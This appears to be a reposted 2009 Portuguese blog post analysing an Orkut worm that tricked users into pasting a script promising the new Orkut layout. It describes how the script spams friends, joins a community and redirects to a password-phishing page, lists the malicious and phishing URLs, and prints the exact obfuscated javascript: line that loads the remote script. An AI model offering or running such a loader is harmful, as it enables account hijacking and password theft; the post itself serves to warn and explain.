=====
LEIA MAIS AQUI =>
http://www.leonardolima.com.br/blog/javascript/brechas-no-novo-orkut
-----
Brechas no novo Orkut...
novembro 27th, 2009 in Blog • Javascript by Leonardo Lima
Nova do momento para sacanear as pessoas no orkut
Esse script é o que está sendo utilizado para enganar o pessoal, falando que é para transformar o orkut na nova versão, sem precisar do convite.
Mas na verdade ele trabalha usando chamadas AJAX e explorando falhas do Orkut, ele pega lista todos os Friends, manda um scrap, um depoimento, pega a primeira foto do primeiro album e posta um comentário, alem de ir na comunidade criada pelo engraçadinho faz o registro na comunidade, e posta em um dos topicos
e por final redireciona o usuário para uma pagina falsa que serve para capturar senhas
Bem espertinho o cara né… Para se proteger o rapaz fez uma verificação de que página está chamando a página dele, e faz um tratamento para não deixar vazar o script facilmente, se voce chama a url camuflada no script sem ser do orkut, ele dá uma página de manutenção, sorte que existe Firebug!!!
Alguns dados
URL da Comunidade : http://www.orkut.com.br/Main#Community?cmm=96481032
URL Camuflada no Script : http://sn.im/neworkuti
URL do Script : http://zapmu.com.br/orkuttt/
URL Orkut Falso : http://convitesaqui.com/Orkut/
Código que a vitima é induzida a executar =>
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='ht'+'tp://sn'+'.im/neworkuti';void(0)
=====
Nenhum comentário:
Postar um comentário